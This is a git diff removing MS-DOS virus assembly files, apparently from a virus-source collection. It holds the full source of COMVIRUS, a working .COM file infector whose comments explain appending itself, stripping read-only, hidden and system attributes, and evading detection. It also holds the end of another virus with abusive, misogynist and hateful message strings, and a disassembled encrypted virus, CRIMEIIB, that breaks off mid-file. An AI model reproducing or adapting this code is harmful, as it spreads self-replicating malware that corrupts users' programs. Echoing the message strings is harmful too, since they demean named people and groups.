fake',13,10,'$' -Msg13 Db 13,10,'(C) by Glenn Benton',13,10,'$' -Msg14 Db 13,10,'Registration number required',13,10,'$' -Msg15 Db 13,10,'The fly is alive',13,10,'$' -Msg16 Db 13,10,'Dont fuck with me, or I will kick some ass...',13,10,'$' -Msg17 Db 13,10,'Hey, dont hit the keys that hard!',13,10,'$' -Msg18 Db 13,10,'You will feel me...',13,10,'$' -Msg19 Db 13,10,'BEER BEER BEER BEER BEER BEER BEER!!!',13,10,'$' -Msg20 Db 13,10,'YOU HAVE A VIRUS, BWAH AH AH EH EH HEH ARF!',13,10,'$' -Msg21 Db 13,10,'I would alter Michael Jacksons face with my fists...',13,10,'$' -Msg22 Db 13,10,'WIM KOK IS STILL A COMMUNIST!',13,10,'$' -Msg23 Db 13,10,'Welcome to COMMENTATOR II',13,10,'$' -Msg24 Db 13,10,'Commentator I & II released!',13,10,'$' -Msg25 Db 13,10,'Legalize ABORTUS!',13,10,'$' -Msg26 Db 13,10,'Ronald McDonald goes Oude-Pekela!',13,10,'$' -Msg27 Db 13,10,'Source code soon aveable...',13,10,'$' -Msg28 Db 13,10,'Dont use a rubber against this virus!',13,10,'$' -Msg29 Db 13,10,'Swimming holiday in Bangladesh!',13,10,'$' -Msg30 Db 13,10,'Neo Nazis are a pile of shit.',13,10,'$' - -Msg31 Db 13,10,'Virus researchers are a pile of meat on the street.',13,10,'$' -Msg32 Db 13,10,'World Championship Cat-Throwing',13,10,'$' -Msg33 Db 13,10,'Yo Yo Yo Yo Yo Yo Yo, James Brown is DEAD!',13,10,'$' -Msg34 Db 13,10,'Yech, you are reminding me of my mother-in-law...',13,10,'$' -Msg35 Db 13,10,'How is the weather out there?',13,10,'$' -Msg36 Db 13,10,'Indalis is a fat bitch who looks like a glass-bin.',13,10,'$' -Msg37 Db 13,10,'Lubbers should be castrated for a long time ago.',13,10,'$' -Msg38 Db 13,10,'Legalize hookers (at a low prize!)',13,10,'$' -Msg39 Db 13,10,'Fist fucking sounds irrelevant to you, eh?',13,10,'$' -Msg40 Db 13,10,'I will be Back...',13,10,'$' -Msg41 Db 13,10,'Today it is..... JUDGEMENT DAY!!!',13,10,'$' -Msg42 Db 13,10,'Never mind the dog, beware of owner.',13,10,'$' -Msg43 Db 13,10,'You still owe me a CO-PROCESSOR!',13,10,'$' -Msg44 Db 13,10,'Do not drink and drive',13,10,'$' -Msg45 Db 13,10,'Last name ALMIGHTY, first name DICK',13,10,'$' -Msg46 Db 13,10,'Frodo lives!',13,10,'$' -Msg47 Db 13,10,'The leech lives',13,10,'$' -Msg48 Db 13,10,'Hey, Cracker Jack! Nice virus you made!',13,10,'$' -Msg49 Db 13,10,'A depressive Prince Claus looks like fun!',13,10,'$' -Msg50 Db 13,10,'Happy Eastern',13,10,'$' -Msg51 Db 13,10,'Thank god for AIDS',13,10,'$' -Msg52 Db 13,10,'Art is incredible stupid',13,10,'$' -Msg53 Db 13,10,'Out of semen error',13,10,'$' -Msg54 Db 13,10,'Incorrect BEF version',13,10,'$' -Msg55 Db 13,10,'Of je stopt de stekker erin?!?',13,10,'$' -Msg56 Db 13,10,'Jean Claude van Damme kicks ass.',13,10,'$' -Msg57 Db 13,10,'Cannabis expands the mind',13,10,'$' -Msg58 Db 13,10,'What is this memory? EMS XMS LIM HMA UMB?',13,10,'$' -Msg59 Db 13,10,'NOOOOOO NOT AN IBM SYSTEM, PLEASE!!!!!',13,10,'$' -Msg60 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' - -; -; All variables are stored in here, like filehandle, date/time, -; search path and various buffers. -; - -FH DW 0 -FindPath DB '*.COM',0 - -Buf1 DW 0 -Buf2 DW 0 - -Sprong DW 0 -Source DW 0 - -; -; This will contain the relocator routine, located at the end of -; the ORIGINAL file. This will tranfer the 1st part of the program -; to it's original place. -; -Mover: - Mov DI,Offset Begin ;------------------ - Mov SI,Source ; Verplaatsen van het 1e deel - Mov CX,VirLen-1 ; van het programma, wat achter - Rep Movsb ;------------------ - Pop DI ; Opgeslagen registers weer - Pop SI ; terugzetten op originele - Pop SS ; waarde en springen naar - Pop ES ; het begin van het programma - Pop DS ; (waar nu het virus niet meer - Pop DX ; staat) - Pop CX ; - Pop BX ; - Pop AX ; - Popf ; - Mov BX,100h ; - Jmp BX ;------------------ - -; -; Only the end of the virus is stored in here. -; -Einde db 0 - -Code Ends -End Begin - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/COMVIRUS (49).ASM b/c/COMVIRUS (49).ASM deleted file mode 100755 index e50cc16..0000000 --- a/c/COMVIRUS (49).ASM +++ /dev/null @@ -1,458 +0,0 @@ -title COMVIRUS -subttl By Drew Eckhardt -subttl Latest revision: 4-28-1991 - -;The author of this virus intends it to be used for educational -;purposes only, and assumes no responsibilities for its release, -;dammages resulting from its use, including but not limited to -;equipment dammage or data loss. - -;By assembling or examining this program, The user agrees to accept all -;responsibility for this programs use, or any portions of the code -;or concepts contained within. The user also agrees to not publicly release -;this virus, and to exercise necessary precautions to prevent its escape. -;The user accepts all responsibility arising from his actions. - -;Don't come crying to me if your hard disk gets infected, -;as THERE IS NO ANTIDOTE. HAHAHAH. - - -;Revision history: -;4-13: initial bug-free release, size=424 bytes with carrier - -;4-15: added no date change support, size=438 bytes with carrier - -;4-16: minor documentation changes, size=438 bytes with carrier, -; NO CODE CHANGE from 4-15 revision - -;4-21: fixed missing hex h suffixs, made MASM friendly, -; fixed incorrect assume statement (assume statements are ignored -; by A86) enabled hard/floppy infection based on floppy_only status -; size=438 bytes IF floppy_only, 424 bytes if not, with carrier. -; minimum virus length = 419 bytes - -;4-23: added control over how many programs are infected per run, -; switched method of infection, from copying to DTA then writing -; to disk to straight write to disk from memory. -; size=412 bytes IF floppy_only, 398 bytes if not, with carrier. -; minimum virus length = 393 bytes - -;4-28: used set DTA instead of default DTA/copy command line -; buffer, which had been used based on incorrect assumption -; eliminated calls to get time/date, get attribs -; by using information from find first/find next functions 4eh/4fh -; made warning optional for reduced space if desired. Also -; changed mov reg16, bp add reg16, constant to shorter LEA instruction. -; size=354 bytes IF floppy_only, warning on W/carrier -; 340 bytes IF w/warning & carrier program -; 286 bytes w/o warning, in program -; minimum virus length = 281 bytes for virus itself - -;4-28pm: instead of near CALL-pop sequences everywhere, switched to -; a single CALL near ptr Reference_Point, putting the result into -; si now that (until the end) string mode addressing is not used. -; Changed places where a register (used as an index) -; was being loaded THEN added to a single LEA isntruction -; size = 340 bytes if floppy_only, warning on w/carrier -; size = 326 bytes if w/warning & carrier -; size = 272 w/o warning -; minimum virus length = 267 bytes for the virus itself - -;4-28pm2: Eliminated unecessary flush buffers call. -; size = 336 bytes if floppy_only w/carrier -; size = 322 bytes w/warning & carrier -; size = 268 w/o warning -; minimum virus length = 263 bytes for virus itself - -;4-30: restored 5 bytes of original code at CS:0100 -; before infecting other programs, allowing the -; original code field to be modified so one disk write could be -; used instead of two -; minor documentation revisions - corrected incorrect -; opcodes in documentation -; size = 326 bytes if floppy_only w/carrier -; size = 312 bytes w/warning & carrier program -; size = 258 bytes w/carrier program -; Minimum virus length = 253 bytes for the virus itself - -;NOTE: The program is currently "set up" for A86 assembly with all -;conditional assembly symbols. #IF and #ENDIF should be replaced with -;MASM IFDEF and ENDIF directives for propper operation. -;Also, instead of using EQUates to define control symbols, the /D -;option or DEFINE could be used..... - - -;COMVIRUS.ASM must be assembled into a .COM file inorder to function -;properly. For convieniece, I recommend an assembler like A86 that will -;assemble to a .COM file without having to go through LINK and EXE2BIN - -;As is, it will infect .COM files located on the current disk. -;ONLY if it is a floppy disk, ONLY in the root directory. - -;This is a .COM infector virus, which, does nothing other than print a -;warning message, and spread to all files on the default disk IFF it is -;a floppy disk, in the root directory. - -;Theory: -;This is a non - overwriting virus. I took special precautions to preserve -;all functionality of the original program, including command line, parsed FCB, -;and segment register preservation. This makes the virus harder to detect. - -;The .COM file is a memory image - with no relocation table. Thus, it -;is an easy target for a virus such as this. - -;Infected file format -;jmp near ptr xxxx -;cli cli ;ID bytes -;ORIGINAL program code, sans 5 bytes -;5 bytes ORIGINAL program code -;VIRUS - -;This format makes infection VERY simple. We merely check for our signature -;(in this case cli cli (fa fa) - instructions that no programmer in his -;right mind would use - loading the original five bytes in the process. -;These original bytes are written to the end of the program, then -;A jump to where the virus is. - -;While infection is easy, this method presents some coding problems, as the -;virus does not know where in memory it is. Therefor, When we want to access -;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the -;stack which is then popped. Addresses are then calculated relative to this -;via LEA - -;To run the program as normal, command line is restored, registers restored, -;And original code copied onto the first five bytes of the program. - - -;Program control symbols defined here -floppy_only equ 1 -infect_per_run equ 1 ;number of programs infected per run -warn_user equ 1 - -_TEXT segment byte 'CODE' - assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT - org 100h - -Start: jmp infect; - -;This is our signature - cli - cli - -;Original code is the data field where we store the original program code -;which will replace our signature and jmp to infect - -Original_Code: int 20h ;five bytes that simply terminate - nop ;the program - nop - nop - - - -;Data for the virus. In a destructive virus, you would want to encrypt -;any strings using a simple one's complement (not) operation so as to -;thwart detection via text search utilities. Since we want detection to -;be easy, this un-encrypted form is fine. - - -Start_Virus: -#IF warn_user - Warning db "This file infected with COMVIRUS 1.0",10,13,'$' -#ENDIF - -;VirusMask is simply an ASCIIZ terminated string of the files we wish to -;infect. - - VirusMask db '*.COM', 0 -Infect: - push ax ;on entry to a .COM program, STACK: - ;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp - ;for the two FCB's in here. Save - ;'em - - ;I use special trickery to find location of data. Since - ;NEAR calls/jmps are RELATIVE, call near ptr find_warn is - ;translated to e8 0000 - which will simply place the location - ;of Reference onto the stack. Our data can be found relative to - ;this point. - - call near ptr Reference ;All data is reference realative to - ;Reference - - -Reference: pop bx ;which is placed into bx for LEA - ;instructions - ;bx now contains the REAL address of - ;Reference - ;si points to real address of original - ;code field - lea si, [bx-(offset Reference - offset Original_Code)] - mov di, 0100h ;original code is at 100h - mov cx, 5 ;5 bytes - cld ;from start of buffer - rep movsb ;do it - - mov si, bx ;since BX is used in handle - ;based DOS calls, for the remainder - ;of the virus, si will contain the - ;actual address of reference - -#IF warn_user - - ;Always calculate the address of data relative to known Reference - ;Point - lea dx, [si-(offset Reference - offset Warning)] - mov ah,9h ;DO dos call, DS:DX pointing - int 21h ;to $ terminated string - - ;We want to make sure that the user gets the message - -WaitForKey: - mov ah, 0bh ;we will wait for a keypress - int 21h ;signifying the user has - or al, al ;seen the message. - jz WaitForKey - -#ENDIF - -#IF FLOPPY_ONLY - - ;Since this is a simple demonstration virus, we will only infect - ;.COM files on the default drive IFF it is a floppy disk.... - ;So, we will get information about the disk drive. - - - push ds ;ds:bx returns a byte to - ;media descriptor - - mov ah, 1bh ;get disk information STACK - int 21h ;DOIT ax (drive ID's) - cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp - - pop ds ;restore ds STACK - jne Floppy ;if it was hard.... ax <--sp - jmp near ptr done ;we're nice guys and are done - -Floppy: ;Since it was floppy, we can go on with the infection! -#ENDIF - ;The default DTA, as is will give us problems. The designers of - ;MickeySoft DOS decided to put default DTA at ofset 128 in - ;the PSP. PROBLEM: This is also where the user's precious command - ;line is, and we MUST remain undectected. SO.... we allocate a - ;DTA buffer on the stack. 43 bytes are needed, 44 will do. - - sub sp, 44 ;allocate space for findfirst/findnext DTA - mov bp, sp ;set up bp as a reference to this area - - ;Set the DTA - mov dx, bp ;point DS:DX to our area - mov ah, 1ah ;set DTA - int 21h - - ;Set up pointers to data in DTA - dta equ word ptr [bp] - file_name equ word ptr [bp+1eh] - attributes equ byte ptr [bp+15h] - time_stamp equ word ptr [bp+16h] - date_stamp equ word ptr [bp+18h] - file_size equ dword ptr [bp+1ah] - - ;We dynamically allocate a variable to store the number of programs STACK - ;The virus has infected. FCB drives - ; bp--> 44 byte DTA - infected_count equ byte ptr[bp-2]; Infected_Count - xor ax, ax ;zero variable, sp--> buffer (6 bytes) - push ax ;allocate it on the stack - sub sp, 6 ;allocate small buffer - - ;Now, we begin looking for files to infect. - lea dx, [si - (offset Reference - offset VirusMask)] - ;DS:DX points to the search string STACK - mov ah, 4eh ;find first matching directory entry FCB drives (word) - mov cx, 111b ;only default directory, FILES - ;hidden, system and normal - int 21h ;doit bp--> 44 byte DTA buffer - ; infected count (word) - jnc Research ;carry is clear when a file was sp--> 6 byte buffer - jmp nofile ;found. - - -ReSearch: -;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx - lea dx, file_name - -;Since this is a virus, we want to infect files that can't be touched by -;DOS commands, this means readonly, system, and hidden files are at our -;mercy. To do this, we rely on the findfrst/next attributes and other data -;to restore the attribute byte to the original settings. get/SET can fix -;them to be suitable - mov cl, attributes - and cl, 11100000b ;not readonly, system, or hidden STACK - ; FCB drives - mov ax, 4301h ;set attributes bp--> buffer (44 bytes) - int 21h ; buffer (6 bytes) - ; sp--> infected_count - jnc NoError ;check for error - jmp Restore_Flags -NoError: - mov ax, 3d02h ;now, open file using handle, - ;read/write access - int 21h ; - jnc NoError2 ;IF there was an error, we are done - jmp Restore_Flags ;But we don't need to commit or close - -NoError2: - mov bx, ax ;The handle was returned in ACC. - ;Howwever, all handle based DOS - ;calls expect it in BX - - -;We don't want to infect the program more than once, so we will -;check to see if it is infected. - - - mov ax, 4200h ;seek relative to start of file - ; bx contains handle from open operation - xor cx,cx ;cx:dx is file pointer - xor dx, dx ; - int 21h ;DOIT - -;Now, we will read in enough data to see if we have our virus signature. - mov ah, 3fh ;read data - lea dx, [si-(offset reference-offset original_code)] - ;into original_code buffer - mov cx, 5 ;5h bytes - ; bx contains handle from last operation - int 21h - - cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah - jne GoApe ;if we aren't already infected, - jmp Error ;go for it - -GoApe: -;Since it is safe to infect, we will - mov ax, 4202h ;seek end of file - xor cx, cx - xor dx, dx - int 21h - - or dx, dx ;check for valid .COM format - jz Less_Than_64K - jmp Error - -Less_Than_64K: - -;Now, we must calculate WHERE the jump will be to. Let's examine the program -;Structure: -;jmp near ptr xxxx -;Cli Cli }These add up to the original length -;Orignal code sans 5 bytes - -;Original_Code (5 bytes) }The length of all virus data -;Other virus data is equal to the difference in -;Infect the addresses of Infect and Original_Code - -;End_Virus - - -;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin) -;However, in the 80x86, NEAR jumps are calculated as an offset from the position -;of the next statement to execute (because of fetch/execute cycle operation). - -;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from -;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code -;+Original_Length-3); - - ;Since AX already contains the original length, we will merely add - ;Space for the virus data, and take care of the three bytes - ;of code generated by the jmp near instruction. - - add ax, (offset Infect - Offset Original_Code -3) - - ;calculate jump address - mov byte ptr [bp-8], 0e9h ;jmp near instruction - mov word ptr [bp-7], ax ;offset for near jmp - mov word ptr [bp-5], 0fafah ;cli cli - - mov ax, 4200h ;seek begining of file - xor cx, cx - mov dx, cx - int 21h - - mov ah, 40h ;write patched code - mov cx, 5 ;5 bytes of code - lea dx, [bp-8] ;our buffer - int 21h - - mov ax, 4202h ;seek EOF - xor cx, cx - xor dx, dx - int 21h - - - lea dx, [si - (offset Reference - offset Original_Code)]; set start - mov cx, (offset End_Virus - offset Original_Code) ;set length - mov ah, 40h ;append virus to file - int 21h ;doit - - inc infected_Count ;bump up the number of programs infected - -Error: mov dx,date_stamp ;restore date - mov cx,time_stamp ;restore time - mov ax, 5701h ;set them - int 21h - - mov ah, 3eh ;close file - int 21h - -Restore_Flags: - xor ch, ch ;zero hi byte flags - mov cl,attributes ;restore flags - lea dx, file_name ;ds:dx points to ASCIIZ string - ;in the buffer, offset 1eh contains - ;the file name - mov ax, 4301h ;get/SET flags - int 21h ;Doit - -DoAgain:;See if we're done infecting - cmp infected_count, infect_per_run - jae NoFile ;if we're done, same as no new file - - - mov ah, 4fh ;find next - int 21h - - jc NoFile ;if carry is clear, DOIT again! - jmp ReSearch - -;Since we have no more files, we will restore things to normal. -NoFile: - mov dx, 80h ;reset default dta at DS:80h - mov ah, 1ah ;set DTA - int 21h - - add sp, 52 ;deallocate buffers and infected_count - - - -;Put original code of program BEFORE it was infected back in place! - - -Done: - pop ax ;restore ax - - - ;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take - ;a RELATIVE address...... BUT a retn opcode pops a near absolute - ;address of the stack - saves us the trouble of some calculating - ;relative to here, and the trouble of a self-modifying - ;far absolute jmp! (5 bytes) - - mov bx, 0100h - push bx - ret ;easiest jump to cs:100 - -End_Virus: -_TEXT ends -end start - diff --git a/c/CRIMEIIB (50).ASM b/c/CRIMEIIB (50).ASM deleted file mode 100755 index de838fb..0000000 --- a/c/CRIMEIIB (50).ASM +++ /dev/null @@ -1,394 +0,0 @@ - -PAGE 59,132 - -; -; -; CRIMEIIB -; -; Created: 31-Jan-91 -; Passes: 5 Analysis Options on: none -; -; - -data_8e equ 20D3h ;* -data_9e equ 28C9h ;* -data_10e equ 3C81h ;* -data_26e equ 8ECDh ;* -data_34e equ 0B7C5h ;* -data_37e equ 0D848h ;* -data_38e equ 0E245h ;* -data_44e equ 0F198h ;* - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -crimeIIb proc far - -start: -;* jmp loc_2 ;* - db 0E9h,0FFh,0FFh - db 1 ; Data table (indexed access) - db 00h, 99h, 5Eh, 81h,0EEh, 03h - db 01h, 83h,0FEh, 00h, 74h, 1Ch - db 2Eh, 8Ah, 94h, 03h, 01h, 8Dh -loc_3: - mov ax,cs - push es - lea bx,[si+12Ah] ; Load effective addr - sub cx,bx - -locloop_4: - mov al,cs:[bx] - xor al,dl - ror dl,1 ; Rotate - mov cs:[bx],al - inc bx - loop locloop_4 ; Loop if cx > 0 - - mov bh,4Ch ; 'L' - loop $+32h ; Loop if cx > 0 - - cbw ; Convrt byte to word - iret ; Interrupt return -;* js loc_6 ;*Jump if sign=1 - db 78h, 35h - xchg ax,di - retn 3479h - adc al,70h ; 'p' - scasb ; Scan es:[di] for al - xor ax,4C20h - db 66h, 83h, 99h, 30h, 95h, 99h - db 29h, 90h, 48h,0BBh, 1Dh, 04h - db 60h, 1Dh, 11h, 48h, 8Eh, 35h - db 0B7h, 44h,0E2h, 3Bh, 9Eh, 41h - db 0F2h, 7Bh, 9Eh, 78h, 7Ch,0FEh - db 0B8h,0FFh,0A6h, 2Dh, 17h, 14h - db 0C7h, 35h, 98h,0D3h, 5Bh, 33h - db 99h -loc_6: - mov cx,1D6Ch - pop di - dec ax - db 0C8h, 32h, 99h, 5Ch, 8Dh, 3Bh - db 09h,0E2h,0A0h,0B7h, 37h,0CDh - db 67h,0A3h, 72h, 81h,0F6h - -locloop_7: - jle loc_3 ; Jump if < or = -;* call far ptr sub_7 ;* - db 9Ah, 63h, 33h, 99h,0CCh - db 67h, 33h, 98h, 3Ch, 99h,0C3h - db 66h,0CCh, 66h, 33h, 99h,0CDh - db 66h,0FEh,0B9h,0CCh - db 64h, 37h - db 99h - db 0CCh, 66h - dw 9931h ; Data table (indexed access) - db 33h, 69h,0CCh, 66h,0CCh, 66h - db 0CDh, 66h,0CCh, 66h,0D3h, 98h - db 0CCh, 66h, 2Fh, 99h,0CCh, 66h - db 26h, 98h,0CEh - db 65h, 33h - -locloop_8: - cbw ; Convrt byte to word - xor bp,[bp+si+39h] - cbw ; Convrt byte to word - out 48h,al ; port 48h ??I/O Non-standard - jbe $-3Dh ; Jump if below or = - mov [bp+19h],sp - mov bh,8Fh - sub [bp-67h],di - in al,dx ; port 0, DMA-1 bas&add ch 0 - db 66h, 37h, 70h,0CCh, 66h,0B0h - db 67h,0CCh, 13h, 30h, 70h, 1Bh - db 66h, 1Dh, 12h, 48h,0F7h - db 32h,0A4h, 81h, 3Ch -loc_10: - inc si - nop - loop locloop_7 ; Loop if cx > 0 - - mov bh,16h - int 67h ; ??INT Non-standard interrupt - esc 0,[bp+si+485Ch] ; coprocessor escape - cmc ; Complement carry - sbb ax,6743h - xor dx,[si] -;* jo loc_11 ;*Jump if overflow=1 - db 70h,0F7h - xor ah,[bp+si] - int 3 ; Debug breakpoint - db 67h, 8Ah, 97h,0CCh - -locloop_12: - in ax,dx ; port 0, DMA-1 bas&add ch 0 - db 36h, 10h,0CBh, 25h - db 70h,0DEh, 8Bh, 84h,0C5h,0B7h - db 47h,0E2h,0B0h, 98h,0E2h,0EFh - db 0B7h, 1Ch,0CDh - db 48h,0B8h, 1Dh, 4Bh, 67h, 1Dh - db 10h, 48h,0EFh, 32h,0B7h, 47h - db 0E2h, 94h, 98h,0E2h,0EFh,0B7h - db 12h,0CDh,0D2h, 19h, 54h,0EDh - db 48h, 0Ah, 0Dh, 78h, 67h, 4Fh - db 9Ah, 27h, 19h,0A3h,0B7h,0F6h - db 0E2h, 9Dh, 98h,0B9h, 65h,0D8h - db 0ECh, 5Ch,0EBh,0AFh, 16h,0CEh - db 0DFh, 2Ah, 99h,0E2h,0ECh, 24h - db 19h, 3Eh, 33h, 87h, 9Bh, 01h - db 47h, 70h, 7Bh, 3Fh,0EBh,0AFh - db 51h,0CAh,0DEh, 33h, 98h,0FFh - db 0AFh, 1Dh, 10h,0CBh, 25h, 70h - db 67h, 08h, 27h,0B0h, 60h,0ECh - db 18h,0C0h, 14h, 50h,0AEh, 35h - db 2Ch,0CCh,0DCh,0B3h, 99h, 79h - db 66h, 83h, 99h, 7Dh, 60h,0E1h - db 79h, 46h,0AEh,0B3h, 50h,0CDh - db 0DEh, 33h, 9Ch, 01h, 75h, 41h - db 9Eh, 32h,0A0h,0B3h, 67h,0C5h - db 13h,0D6h, 20h,0C9h, 66h, 87h - db 9Bh, 7Eh, 61h,0FEh,0B8h, 2Eh - db 9Eh,0D8h, 67h, 93h, 3Eh, 22h - db 8Dh,0CDh, 72h, 25h, 9Eh,0D0h - db 7Eh, 23h,0ECh,0D0h, 7Ah, 46h - db 0ECh,0CFh, 7Ah, 34h, 99h,0CAh - db 39h, 6Bh,0C6h, 94h,0D2h, 2Ah - db 54h,0EDh, 48h,0BBh, 1Dh, 09h - db 67h, 87h,0DEh,0FFh,0B4h - db 65h - db 14h, 78h,0AFh, 35h, 54h,0EDh - db 38h - db 1Dh, 5Fh, 48h,0D0h, 32h, 99h - db 24h, 3Bh - -locloop_17: - xor dx,[si] - push ax - db 0C9h, 32h,0B7h, 46h,0E2h, 85h - db 98h,0E2h, 98h,0B7h, 2Fh,0CDh - db 0FEh - db 30h - db 41h,0E2h,0ECh, 34h - db 13h, 1Ch, 5Ah,0CCh,0ECh,0CFh - db 8Fh, 1Eh, 9Ah, 4Ch, 9Ch, 32h - db 0ECh,0DCh, 48h,0B9h, 1Dh, 62h - db 67h, 0Fh, 98h,0B8h,0B3h, 0Fh - db 9Bh,0B9h, 65h,0DAh,0A5h, 33h - db 0D2h, 3Dh, 54h,0EDh,0D2h, 74h - db 2Bh,0CCh, 30h,0BEh, 2Dh, 25h - db 60h,0FEh,0B8h, 92h,0DDh, 37h - db 99h,0E2h - db 0ECh, 34h,0A5h,0CFh, 13h, 34h - db 29h,0CCh, 48h,0BBh, 9Eh, 27h - db 0CBh,0DBh, 85h,0CDh, 8Eh,0ABh - db 99h - db 0BFh, 48h,0D8h, 3Ah,0FFh,0A6h - db 2Dh, 17h, 14h,0DDh,0A3h, 99h - db 47h, 21h, 31h,0B7h, 45h,0E2h - db 4Eh, 98h, 47h, 61h, 1Dh, 10h - db 48h, 19h, 32h, 15h, 04h,0EFh - db 74h, 9Bh, 41h,0E2h, 74h, 9Ah - db 45h, 61h, 2Ch, 5Ah, 77h, 62h - db 33h,0B7h, 0Ah, 61h, 30h, 56h - db 75h, 26h, 33h,0CFh, 83h, 29h - db 7Ch, 5Eh,0C9h, 46h, 6Fh, 12h - db 3Fh, 9Ah, 9Fh, 33h, 85h, 5Ah - db 33h,0ECh, 35h, 38h, 87h,0A2h - db 41h,0F2h, 3Bh, 9Eh, 01h, 47h - db 0DBh, 51h,0CCh, 8Eh, 77h, 99h - db 0BFh,0BCh, 87h,0A2h, 41h,0F2h - db 0DBh, 9Fh, 01h, 47h, 1Dh - db 67h, 48h - -locloop_21: - retf - xor dh,[bx+di-2] - db 66h, 40h, 9Ah, 25h,0E0h, 31h - db 0B7h, 46h,0E2h, 9Eh, 98h,0F0h - db 66h, 46h, 9Ch, 4Fh,0A5h, 3Ah - db 72h, 7Bh,0D2h, 7Ch,0C9h, 01h - db 47h, 6Bh,0EAh,0CFh, 8Fh, 10h - db 66h, 9Ch,0D2h, 1Ch, 54h,0EDh - db 0E5h,0F0h, 8Ch - db 7Ch, 76h, 1Dh,0A1h,0CBh, 3Eh - db 46h, 7Ch, 32h,0AEh,0D8h - db 41h, 41h,0DAh, 3Ah, 9Eh, 75h - db 5Ch, 33h, 29h,0CCh, 9Ah,0C0h - db 33h, 78h, 21h, 65h,0AAh, 1Eh - db 0EBh, 87h, 90h,0CBh,0ABh, 12h - db 0C7h, 30h,0EBh, 8Fh, 90h,0CBh - db 0DFh, 73h, 99h, 7Ch, 66h,0C1h - db 37h,0B8h, 64h,0CAh, 5Ah, 83h - db 29h,0B9h, 9Ch,0F0h - db 3Ah, 47h - db 9Ah, 8Bh,0D6h, 6Fh,0B7h, 44h - db 63h, 74h, 29h,0E6h, 48h,0BBh - db 9Ch, 8Bh,0D6h, 1Dh,0B7h, 44h - db 63h, 74h, 29h,0E6h, 48h,0BBh - db 9Ch, 8Bh,0EBh,0A7h, 91h,0CBh - db 0D2h, 7Dh, 20h,0DCh, 66h,0FEh - db 0B8h,0BFh, 67h,0F0h, 2Dh,0E3h - db 60h,0FEh,0B8h, 4Fh,0A5h, 26h - db 29h,0DCh - db 40h, 0Bh, 9Eh,0CBh, 13h - db 21h, 61h, 78h, 49h, 35h, 54h -loc_26: - in ax,dx ; port 0, DMA-1 bas&add ch 0 - in ax,0F0h ; port 0F0h ??I/O Non-standard - xchg di,[si+48h] - sbb ax,0CBA1h - db 61h, 47h, 98h, 0Fh,0D2h, 7Ch - db 54h,0EDh, 15h,0EBh, 60h, 0Fh - db 0D2h, 7Dh, 20h,0CBh, 66h,0BEh - db 0Dh, 7Bh, 67h,0FEh,0B8h,0BEh - db 77h,0DBh,0B4h,0CCh,0D2h, 7Ch - db 20h,0CBh, 66h,0FEh,0B8h,0BEh - db 63h,0DBh,0B8h,0CCh, 8Dh,0C1h - db 14h, 58h,0DBh, 32h, 2Dh, 82h - db 0DFh, 34h, 99h, 01h, 47h, 41h - db 88h, 24h, 69h, 33h, 2Dh, 83h - db 0DFh, 34h, 99h, 01h, 47h, 41h - db 9Ch, 24h, 65h, 33h, 72h, 3Eh - db 0A5h, 87h,0B6h,0CAh,0ABh, 12h - db 1Ah, 0Fh, 79h, 15h, 13h,0CBh - db 61h, 0Fh,0DBh,0B9h, 67h,0F0h - db 2Dh,0E3h, 60h,0FEh,0B8h, 4Fh - db 0A5h, 25h,0BFh, 47h, 69h,0B0h - db 5Ah,0CEh, 40h,0B8h, 8Eh,0CBh - db 0ECh,0F2h,0BDh, 2Ch,0ECh,0D3h - db 0C8h - db 'uc3K$' - db '?9]' - db 0C8h, 63h, 09h, 58h,0B8h, 63h - db 0B9h, 51h, 27h, 64h,0A3h, 5Ah - db 94h, 3Eh, 62h,0CBh,0D2h, 60h - db 87h,0B6h, 01h, 47h,0BFh, 59h - db 42h,0BEh,0DBh, 8Ah,0CDh,0EDh - db 0E0h, 1Ah, 0Eh, 78h, 8Bh, 9Bh - db 0F1h,0ABh, 12h, 12h, 14h, 61h - db 2Ch, 2Dh,0F3h,0EBh,0A7h, 08h - db 0CDh,0DFh, 2Fh, 99h, 01h, 47h - db 1Dh - db 13h, 68h,0F7h - db 32h,0B7h, 46h,0E2h,0A1h, 98h - db 0F1h, 3Ch, 7Eh,0EDh,0CFh, 8Fh - db 0AAh, 99h,0E2h,0EDh,0B7h, 3Ch - db 0CDh, 48h,0BAh, 1Dh, 4Fh, 67h - db 1Dh, 12h, 48h,0C1h, 32h,0B7h - db 45h,0E2h,0B4h, 98h,0E2h - db 0EDh,0B7h, 0Ch,0CDh, 35h, 00h - db 42h,0FFh,0AFh,0E2h, 49h, 46h - db 0AAh,0E2h, 41h, 4Fh, 9Fh, 33h - db 0EDh,0CAh,0E7h,0F0h, 99h,0DCh - db 84h,0C9h, 28h,0C5h,0B5h,0D3h - db 20h,0C8h, 66h, 1Dh, 12h, 58h - db 0FFh, 32h, 4Ah, 2Eh, 36h, 18h - db 5Bh,0E2h,0EFh,0AFh, 3Eh,0CDh - db 48h,0BAh, 05h - db 53h, 67h - db 1Dh, 10h, 48h,0C3h, 32h, 20h - db 0CCh, 64h, 1Dh, 10h, 40h,0F5h - db 32h, 20h, 32h, 99h, 1Dh, 10h - db 40h,0C7h, 32h,0B7h, 47h,0EAh - db 0A6h, 98h, 4Fh,0A7h, 30h,0B7h - db 45h - -locloop_31: - jmp far ptr $-6CB4h - loop $+74h ; Loop if cx > 0 - - sbb ax,0E28Dh - jc $+4Ch ; Jump if carry Set - mov cx,52B8h - xchg ax,si - esc 6,[bp+di] ; coprocessor escape - esc 3,ds:[12ABh][bx] ; coprocessor escape -;* jno loc_30 ;*Jump if not overflw - db 71h,0C9h - db 67h, 8Bh, 99h, 8Eh, 55h,0FAh - db 0AAh, 1Eh,0ABh, 12h, 2Dh, 8Ch - db 0DFh, 2Fh, 99h, 41h,0F2h,0A2h - db 98h, 01h, 47h,0D8h,0AEh, 5Ch - db 0DEh, 31h,0DBh,0FFh,0AFh, 00h - db 